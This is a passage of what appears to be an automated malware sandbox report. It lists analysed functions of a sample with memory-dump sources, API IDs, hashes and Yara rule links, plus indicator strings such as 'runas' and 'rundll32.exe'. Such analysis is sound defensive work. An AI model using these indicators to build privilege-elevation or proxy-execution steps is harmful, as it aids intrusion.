                            • Associated: 00000003.00000002.944130647.0000000001420000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944141105.0000000001422000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944154999.0000000001426000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944165392.0000000001428000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944179801.000000000142A000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944197325.000000000142C000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944209577.000000000142E000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944223198.0000000001430000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944259364.000000000143D000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944275635.0000000001447000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944289674.0000000001449000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944305770.000000000144E000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944318489.0000000001450000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944343623.0000000001452000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944355599.0000000001454000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944372185.0000000001458000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944385917.000000000145A000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944407165.000000000145C000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944424594.000000000146A000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944456168.0000000001472000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944470656.0000000001474000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944482979.0000000001476000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944498650.0000000001478000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944511282.000000000147A000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944526676.000000000147C000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944539968.000000000147E000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944580946.00000000014A7000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944600669.00000000014AE000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944873864.0000000001672000.00000020.00020000.sdmp Download File
                            Similarity
                            • API ID: DeleteFile__dosmaperr_free
                            • String ID:
                            • API String ID: 2668308924-0
                            • Opcode ID: fea36864478443584411032991ad0371886433da81838ce4a1afd7575e3c5e7e
                            • Instruction ID: 8b7e05d76afd14d1bafbd69b8160d7853f965d16d39f4184fa8f6a0b7f29450b
                            • Opcode Fuzzy Hash: fea36864478443584411032991ad0371886433da81838ce4a1afd7575e3c5e7e
                            • Instruction Fuzzy Hash: A101D171C2021AEEDF05ABBCAC01BAEBFFCAB04218F144176D914E21D1EB748AC0C781
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01266AEA, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
                            Download Yara Rule
                            APIs
                            • RtlAllocateHeap.NTDLL(00000000,0125E3EC), ref: 01266B1C
                            Memory Dump Source
                            • Source File: 00000003.00000002.943799563.0000000001251000.00000020.00020000.sdmp, Offset: 01250000, based on PE: true
                            • Associated: 00000003.00000002.943789512.0000000001250000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943825611.0000000001277000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943839345.0000000001280000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943854454.0000000001283000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943875599.0000000001285000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943891078.0000000001288000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943904070.0000000001289000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943917656.000000000128A000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944130647.0000000001420000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944141105.0000000001422000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944154999.0000000001426000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944165392.0000000001428000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944179801.000000000142A000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944197325.000000000142C000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944209577.000000000142E000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944223198.0000000001430000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944259364.000000000143D000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944275635.0000000001447000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944289674.0000000001449000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944305770.000000000144E000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944318489.0000000001450000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944343623.0000000001452000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944355599.0000000001454000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944372185.0000000001458000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944385917.000000000145A000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944407165.000000000145C000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944424594.000000000146A000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944456168.0000000001472000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944470656.0000000001474000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944482979.0000000001476000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944498650.0000000001478000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944511282.000000000147A000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944526676.000000000147C000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944539968.000000000147E000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944580946.00000000014A7000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944600669.00000000014AE000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944873864.0000000001672000.00000020.00020000.sdmp Download File
                            Similarity
                            • API ID: AllocateHeap
                            • String ID:
                            • API String ID: 1279760036-0
                            • Opcode ID: 28171e2807fc2bb3e5f147d9818ad291a2faddaa0339146a0ccabb0417517ab2
                            • Instruction ID: a059acb7dc6b75611a329ed1edd49e86d480b739094682cca3b63922b561e825
                            • Opcode Fuzzy Hash: 28171e2807fc2bb3e5f147d9818ad291a2faddaa0339146a0ccabb0417517ab2
                            • Instruction Fuzzy Hash: 97E06531271167FAEA3126699C04B7A7ECCAB513A1F050124DE55B61D4FB60DC8182A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0125E420, Relevance: 1.3, APIs: 1, Instructions: 24sleepCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000003.00000002.943799563.0000000001251000.00000020.00020000.sdmp, Offset: 01250000, based on PE: true
                            • Associated: 00000003.00000002.943789512.0000000001250000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943825611.0000000001277000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943839345.0000000001280000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943854454.0000000001283000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943875599.0000000001285000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943891078.0000000001288000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943904070.0000000001289000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943917656.000000000128A000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944130647.0000000001420000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944141105.0000000001422000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944154999.0000000001426000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944165392.0000000001428000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944179801.000000000142A000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944197325.000000000142C000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944209577.000000000142E000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944223198.0000000001430000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944259364.000000000143D000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944275635.0000000001447000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944289674.0000000001449000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944305770.000000000144E000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944318489.0000000001450000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944343623.0000000001452000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944355599.0000000001454000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944372185.0000000001458000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944385917.000000000145A000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944407165.000000000145C000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944424594.000000000146A000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944456168.0000000001472000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944470656.0000000001474000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944482979.0000000001476000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944498650.0000000001478000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944511282.000000000147A000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944526676.000000000147C000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944539968.000000000147E000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944580946.00000000014A7000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944600669.00000000014AE000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944873864.0000000001672000.00000020.00020000.sdmp Download File
                            Similarity
                            • API ID: Sleep
                            • String ID:
                            • API String ID: 3472027048-0
                            • Opcode ID: bf16a7de7b2447667d763a8c42a490e90b00e38e1cdb31e60d439e5303682a3f
                            • Instruction ID: e67ecf2dcd7824f3c4272915556a6d246381f77c186c05e1e20283047fe332ff
                            • Opcode Fuzzy Hash: bf16a7de7b2447667d763a8c42a490e90b00e38e1cdb31e60d439e5303682a3f
                            • Instruction Fuzzy Hash: 08E0C216F70011238791367D0CA793E78157FE3460B8A15CCDC422B3C2FC601A1503E7
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0125E470, Relevance: 1.3, APIs: 1, Instructions: 24sleepCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000003.00000002.943799563.0000000001251000.00000020.00020000.sdmp, Offset: 01250000, based on PE: true
                            • Associated: 00000003.00000002.943789512.0000000001250000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943825611.0000000001277000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943839345.0000000001280000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943854454.0000000001283000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943875599.0000000001285000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943891078.0000000001288000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943904070.0000000001289000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943917656.000000000128A000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944130647.0000000001420000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944141105.0000000001422000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944154999.0000000001426000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944165392.0000000001428000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944179801.000000000142A000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944197325.000000000142C000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944209577.000000000142E000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944223198.0000000001430000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944259364.000000000143D000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944275635.0000000001447000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944289674.0000000001449000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944305770.000000000144E000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944318489.0000000001450000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944343623.0000000001452000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944355599.0000000001454000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944372185.0000000001458000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944385917.000000000145A000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944407165.000000000145C000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944424594.000000000146A000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944456168.0000000001472000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944470656.0000000001474000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944482979.0000000001476000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944498650.0000000001478000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944511282.000000000147A000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944526676.000000000147C000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944539968.000000000147E000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944580946.00000000014A7000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944600669.00000000014AE000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944873864.0000000001672000.00000020.00020000.sdmp Download File
                            Similarity
                            • API ID: Sleep
                            • String ID:
                            • API String ID: 3472027048-0
                            • Opcode ID: 5758e9a17cc2aa67e6bf93c51dbeac645edc7c6a73552844e26ec55b5e7f0743
                            • Instruction ID: 2af60425a85b52d3e3265219e8c67e809de366b65866fc6f64323fc9ab08ae6e
                            • Opcode Fuzzy Hash: 5758e9a17cc2aa67e6bf93c51dbeac645edc7c6a73552844e26ec55b5e7f0743
                            • Instruction Fuzzy Hash: 39E08C15F30021238B95367D0CA753EB815AFA24A0B86158CDC422B3C2FC601A1503E7
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 013A77B0, Relevance: 1.3, APIs: 1, Instructions: 24sleepCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000003.00000002.943917656.000000000128A000.00000040.00020000.sdmp, Offset: 01250000, based on PE: true
                            • Associated: 00000003.00000002.943789512.0000000001250000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943799563.0000000001251000.00000020.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943825611.0000000001277000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943839345.0000000001280000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943854454.0000000001283000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943875599.0000000001285000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943891078.0000000001288000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943904070.0000000001289000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944130647.0000000001420000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944141105.0000000001422000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944154999.0000000001426000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944165392.0000000001428000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944179801.000000000142A000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944197325.000000000142C000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944209577.000000000142E000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944223198.0000000001430000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944259364.000000000143D000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944275635.0000000001447000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944289674.0000000001449000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944305770.000000000144E000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944318489.0000000001450000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944343623.0000000001452000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944355599.0000000001454000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944372185.0000000001458000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944385917.000000000145A000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944407165.000000000145C000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944424594.000000000146A000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944456168.0000000001472000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944470656.0000000001474000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944482979.0000000001476000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944498650.0000000001478000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944511282.000000000147A000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944526676.000000000147C000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944539968.000000000147E000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944580946.00000000014A7000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944600669.00000000014AE000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944873864.0000000001672000.00000020.00020000.sdmp Download File
                            Similarity
                            • API ID: Sleep
                            • String ID:
                            • API String ID: 3472027048-0
                            • Opcode ID: c6ca1e440214ae8678fb7d5d608053b0d13aaa11066205566f8201567b02fa5f
                            • Instruction ID: 329364776fdd91e034d7c9b2562216be072a981fda682e9b5ccdf371e56be7ae
                            • Opcode Fuzzy Hash: c6ca1e440214ae8678fb7d5d608053b0d13aaa11066205566f8201567b02fa5f
                            • Instruction Fuzzy Hash: 88E01AB111E708DAD70E3EA99CC547ABBE8BA01650F81053F85C705681DA7265438A93
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0125E3D0, Relevance: 1.3, APIs: 1, Instructions: 24sleepCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000003.00000002.943799563.0000000001251000.00000020.00020000.sdmp, Offset: 01250000, based on PE: true
                            • Associated: 00000003.00000002.943789512.0000000001250000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943825611.0000000001277000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943839345.0000000001280000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943854454.0000000001283000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943875599.0000000001285000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943891078.0000000001288000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943904070.0000000001289000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943917656.000000000128A000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944130647.0000000001420000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944141105.0000000001422000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944154999.0000000001426000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944165392.0000000001428000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944179801.000000000142A000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944197325.000000000142C000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944209577.000000000142E000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944223198.0000000001430000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944259364.000000000143D000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944275635.0000000001447000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944289674.0000000001449000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944305770.000000000144E000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944318489.0000000001450000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944343623.0000000001452000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944355599.0000000001454000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944372185.0000000001458000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944385917.000000000145A000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944407165.000000000145C000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944424594.000000000146A000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944456168.0000000001472000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944470656.0000000001474000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944482979.0000000001476000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944498650.0000000001478000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944511282.000000000147A000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944526676.000000000147C000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944539968.000000000147E000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944580946.00000000014A7000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944600669.00000000014AE000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944873864.0000000001672000.00000020.00020000.sdmp Download File
                            Similarity
                            • API ID: Sleep
                            • String ID:
                            • API String ID: 3472027048-0
                            • Opcode ID: 203ac1be30918bab42ff5e69f27c82f2eee0884da08088683a237c1162c19d80
                            • Instruction ID: 86a84885d57f21e402b59ba4b601c801bb3f99845124b375c44600817b139506
                            • Opcode Fuzzy Hash: 203ac1be30918bab42ff5e69f27c82f2eee0884da08088683a237c1162c19d80
                            • Instruction Fuzzy Hash: EEE0C219F30111238695367E1CA753EB8196FB34A078615CCDC422B3C6FCA01A2203E3
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Non-executed Functions

                            Function 0127CD15, Relevance: 11.4, Strings: 9, Instructions: 163COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.943825611.0000000001277000.00000040.00020000.sdmp, Offset: 01250000, based on PE: true
                            • Associated: 00000003.00000002.943789512.0000000001250000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943799563.0000000001251000.00000020.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943839345.0000000001280000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943854454.0000000001283000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943875599.0000000001285000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943891078.0000000001288000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943904070.0000000001289000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943917656.000000000128A000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944130647.0000000001420000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944141105.0000000001422000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944154999.0000000001426000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944165392.0000000001428000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944179801.000000000142A000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944197325.000000000142C000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944209577.000000000142E000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944223198.0000000001430000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944259364.000000000143D000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944275635.0000000001447000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944289674.0000000001449000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944305770.000000000144E000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944318489.0000000001450000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944343623.0000000001452000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944355599.0000000001454000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944372185.0000000001458000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944385917.000000000145A000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944407165.000000000145C000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944424594.000000000146A000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944456168.0000000001472000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944470656.0000000001474000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944482979.0000000001476000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944498650.0000000001478000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944511282.000000000147A000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944526676.000000000147C000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944539968.000000000147E000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944580946.00000000014A7000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944600669.00000000014AE000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944873864.0000000001672000.00000020.00020000.sdmp Download File
                            Similarity
                            • API ID:
                            • String ID: 0%x$6063c37cb8b7acb935de6a3fe03554de$7b6145$ca82a716069a53b0dc5455daf1f535ef$ntdll.dll$runas$runas$rundll32.exe$stoi argument out of range
                            • API String ID: 0-3526321797
                            • Opcode ID: c8fa537dd11400de8f405593a50ef8745c8928572e3fca540e20fa2a0c5185e8
                            • Instruction ID: 49448786f612d1363160a3919121d57a3d0d9764c6e162248049d76bf19008f1
                            • Opcode Fuzzy Hash: c8fa537dd11400de8f405593a50ef8745c8928572e3fca540e20fa2a0c5185e8
                            • Instruction Fuzzy Hash: A251497281E3D24FD7178B308A65042BFB0BF1320071E86DFC5C18F5A3E664A969D3A6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0127CD50, Relevance: 10.1, Strings: 8, Instructions: 128COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.943825611.0000000001277000.00000040.00020000.sdmp, Offset: 01250000, based on PE: true
                            • Associated: 00000003.00000002.943789512.0000000001250000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943799563.0000000001251000.00000020.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943839345.0000000001280000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943854454.0000000001283000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943875599.0000000001285000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943891078.0000000001288000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943904070.0000000001289000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943917656.000000000128A000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944130647.0000000001420000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944141105.0000000001422000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944154999.0000000001426000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944165392.0000000001428000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944179801.000000000142A000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944197325.000000000142C000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944209577.000000000142E000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944223198.0000000001430000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944259364.000000000143D000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944275635.0000000001447000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944289674.0000000001449000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944305770.000000000144E000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944318489.0000000001450000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944343623.0000000001452000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944355599.0000000001454000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944372185.0000000001458000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944385917.000000000145A000.00000040.00020000.sdmp Download File
